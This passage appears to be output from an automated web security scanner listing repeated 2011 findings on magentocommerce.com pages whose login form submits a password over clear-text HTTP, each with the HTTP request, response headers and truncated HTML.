Set-Cookie: exp_last_activity=1313176432; expires=Sat, 11-Aug-2012 15:13:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fmaps%2Fonline%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:52 GMT
Content-Length: 34637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.56. http://www.magentocommerce.com/media/interviews

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field: login[password]

Request

GET /media/interviews HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170899; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.3.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:41:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313170909; expires=Sat, 11-Aug-2012 13:41:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:41:50 GMT
Content-Length: 37734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.57. http://www.magentocommerce.com/media/interviews/alpedia/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/alpedia/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field: login[password]

Request

GET /media/interviews/alpedia/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175966; expires=Sat, 11-Aug-2012 15:06:06 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fmedia%2Finterviews%2Falpedia%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:07 GMT
Content-Length: 38228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.58. http://www.magentocommerce.com/media/interviews/bright-light-media/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/bright-light-media/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field: login[password]

Request

GET /media/interviews/bright-light-media/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175934; expires=Sat, 11-Aug-2012 15:05:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Finterviews%2Fbright-light-media%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:34 GMT
Content-Length: 39078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.59. http://www.magentocommerce.com/media/interviews/buettenpapierfabrik-gmund/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/buettenpapierfabrik-gmund/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field: login[password]

Request

GET /media/interviews/buettenpapierfabrik-gmund/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175956; expires=Sat, 11-Aug-2012 15:05:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fmedia%2Finterviews%2Fbuettenpapierfabrik-gmund%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:56 GMT
Content-Length: 37720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.60. http://www.magentocommerce.com/media/interviews/jack-wolfskin/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/jack-wolfskin/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field: login[password]

Request

GET /media/interviews/jack-wolfskin/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175910; expires=Sat, 11-Aug-2012 15:05:10 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A37%3A%22%2Fmedia%2Finterviews%2Fjack-wolfskin%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:10 GMT
Content-Length: 39204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.61. http://www.magentocommerce.com/media/interviews/liaison-dangereuse/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/liaison-dangereuse/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field: login[password]

Request

GET /media/interviews/liaison-dangereuse/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175958; expires=Sat, 11-Aug-2012 15:05:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Finterviews%2Fliaison-dangereuse%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:58 GMT
Content-Length: 37866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.62. http://www.magentocommerce.com/media/interviews/lodger-footwear/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/lodger-footwear/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field: login[password]

Request

GET /media/interviews/lodger-footwear/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175884; expires=Sat, 11-Aug-2012 15:04:44 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fmedia%2Finterviews%2Flodger-footwear%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:44 GMT
Content-Length: 37831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.63. http://www.magentocommerce.com/media/interviews/man-junk/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/man-junk/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field: login[password]

Request

GET /media/interviews/man-junk/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175946; expires=Sat, 11-Aug-2012 15:05:46 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fmedia%2Finterviews%2Fman-junk%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:47 GMT
Content-Length: 37429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.64. http://www.magentocommerce.com/media/interviews/nerdyshirts/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/nerdyshirts/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field: login[password]

Request

GET /media/interviews/nerdyshirts/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175960; expires=Sat, 11-Aug-2012 15:06:00 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A35%3A%22%2Fmedia%2Finterviews%2Fnerdyshirts%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:00 GMT
Content-Length: 37004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.65. http://www.magentocommerce.com/media/interviews/quadra-informatique-and-anneau-du-rhin-society/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/quadra-informatique-and-anneau-du-rhin-society/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field: login[password]

Request

GET /media/interviews/quadra-informatique-and-anneau-du-rhin-society/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175890; expires=Sat, 11-Aug-2012 15:04:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A70%3A%22%2Fmedia%2Finterviews%2Fquadra-informatique-and-anneau-du-rhin-society%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:50 GMT
Content-Length: 38775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.66. http://www.magentocommerce.com/media/interviews/sbs-broadcasting/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/sbs-broadcasting/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field: login[password]

Request

GET /media/interviews/sbs-broadcasting/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175905; expires=Sat, 11-Aug-2012 15:05:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fmedia%2Finterviews%2Fsbs-broadcasting%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:05 GMT
Content-Length: 38327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.67. http://www.magentocommerce.com/media/interviews/shoebacca/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/shoebacca/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field: login[password]

Request

GET /media/interviews/shoebacca/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175973; expires=Sat, 11-Aug-2012 15:06:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fmedia%2Finterviews%2Fshoebacca%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:13 GMT
Content-Length: 37269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.68. http://www.magentocommerce.com/media/interviews/signing-time/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/signing-time/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field: login[password]

Request

GET /media/interviews/signing-time/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175964; expires=Sat, 11-Aug-2012 15:06:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fmedia%2Finterviews%2Fsigning-time%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:04 GMT
Content-Length: 39390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
